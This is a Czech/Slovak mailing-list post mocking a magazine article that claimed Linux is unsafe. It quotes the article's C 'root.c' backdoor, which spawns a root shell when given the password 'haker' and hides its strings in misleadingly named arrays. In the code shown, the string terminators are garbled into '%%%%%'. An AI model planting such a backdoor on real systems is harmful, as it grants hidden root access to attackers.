Bezpecnost Linuxu

[Ondrej Sury]

uhlar na fantomas.sk wrote:
> 
> Jan Kasprzak <kas na informatics.muni.cz> wrote:
> ->      Pan Janda dnes zveřejnil na Neviditelném Psu další článek,
> -> který má dokázat, jak je Linux nebezpečný. Odvozuje to z toho,
> -> že k Linuxu jsou dostupné zdrojové texty. Autor ukazuje, jak si vytvoří
> -> pomocí krátkého wrapperu v jazyce C zadní vrátka (backdoor) do systému,
> -> je-li superuživatelem.
> 
> Kazdy kto sa len trosku vyzna v C pri pohlade na ten zdrojak asi odpadne...
> 
> /* ------------start root.c------------- */
> 
> main(argc, argv)
>         int argc;
>         char **argv;
> {
> char seteuid[10];
> char showmount[10];
> 
>         seteuid[0]='h';
>         seteuid[1]='a';
>         seteuid[2]='k';
>         seteuid[3]='e';
>         seteuid[4]='r';
>         seteuid[5]='%%%%%';
>         showmount[0]='/';
>         showmount[1]='b';
>         showmount[2]='i';
>         showmount[3]='n';
>         showmount[4]='/';
>         showmount[5]='b';
>         showmount[6]='a';
>         showmount[7]='s';
>         showmount[8]='h';
>         showmount[9]='%%%%%';
>         if (argc>1) {
>            if (!strcmp(argv[1],seteuid)) {
>                 setuid(0);
>                 setgid(0);
>                 execl(showmount,"-i",0);
>            }
>         }
> }
> 
> /* ---------konec root.c----------- */

No ja si z myslim, ze schvalne pise blaboly, protoze se mi zda, ze
tomu tak nejak rozumi.  (Teda pokud tenhle zdrojak neni vyhrabany
z nejake konference, o cemz pochybuji, protoze tohle se neda
napsat neumyslne.)

-- 
Ondrej Sury <ondrej na sury.cz> Globe Internet s.r.o. http://globe.cz/
Tel: +420235365000 Fax: +420235365009  Planickova 1, 162 00 Praha 6
Mob: +420602667702 ICQ: 24944126      Mapa: http://globe.namape.cz/
NAJDI.TO http://najdi.to/                 PRESS.CZ http://press.cz/